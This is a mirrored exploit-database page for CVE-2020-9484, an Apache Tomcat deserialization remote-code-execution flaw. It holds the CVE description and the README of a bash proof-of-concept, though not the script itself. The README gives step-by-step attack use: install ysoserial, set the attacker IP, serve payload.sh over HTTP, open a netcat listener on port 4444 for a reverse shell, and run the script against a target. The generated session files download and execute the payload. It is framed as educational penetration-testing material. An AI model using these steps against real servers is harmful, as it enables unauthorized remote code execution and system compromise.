CVE-2020-9484 PoC — Apache Tomcat 代码问题漏洞

Source

https://github.com/PenTestical/CVE-2020-9484

Associated Vulnerability

Title:Apache Tomcat 代码问题漏洞 (CVE-2020-9484)
Description:When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.

Readme

# Remote Code Execution Exploit in Apache Tomcat 9.0.27

Apache Tomcat 9.0.27 is vulnerable to Remote Code Execution with the CVE-ID CVE-2020-9484. Other versions may be affected as well. Tested on Kali 2020.4 and JDK 8. This bash script is a simpel proof-of-concept. For educational purpose only.

## Description

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to insecure input validation when processing serialized data in uploaded files names. A remote attacker can pass specially crafted file name to the application and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system but requires that the server is configured to use PersistenceManager with a FileStore and the attacker knows relative file path from storage location.

## Requirements

In order to use the script, [yoserial](https://github.com/frohoff/ysoserial) is needed. To install it:

`cd /opt && git clone https://github.com/frohoff/ysoserial`

`cd /opt/ysoserial && wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O ysoserial-master.jar`

If you have yoserial already installed, make sure to rename it to "yosorial-master.jar".

## Installation

To install the script, type:

`cd /opt && git clone https://github.com/PenTestical/CVE-2020-9484 && cd CVE-2020-9484/ && chmod +x CVE-2020-9484.sh`

## Help menu

To open the help menu, type:

`./CVE-2020-9484.sh --help`

or

`./CVE-2020-9484.sh -h`


## How to use it

First, open the script and place your own IP address at line 14:

`remote_ip="10.10.16.180" 	# change this`

This script creates the files "payload.sh", "downloadPayload.session", "chmodPayload.session" and "executePayload.session" in the same directory as you currently are. In order to use the exploit, you need to start a simpel listener at port 80. For example, usage with Python3 (start in same folder as you run the script):

`sudo python3 -m http.server 80`

Also, make sure to start a netcat listener at port 4444:

`nc -nvlp 4444`

Now run the script with the IP address of the target system you want to attack:

`./CVE-2020-9484.sh target-ip`

## Troubleshooting

If it does not work, make sure to use JDK 8. To test which version you use, type:

`java -version`

Could not work on JDK version 12 or higher. Read more about it [here](https://github.com/frohoff/ysoserial/issues/107).

File Snapshot


 [4.0K]  /data/pocs/2c0a1bdeee31bb4d1735cc04b6a3602cf0803897
├── [4.9K]  CVE-2020-9484.sh
├── [ 272]  install.txt
├── [ 34K]  LICENSE
└── [2.4K]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!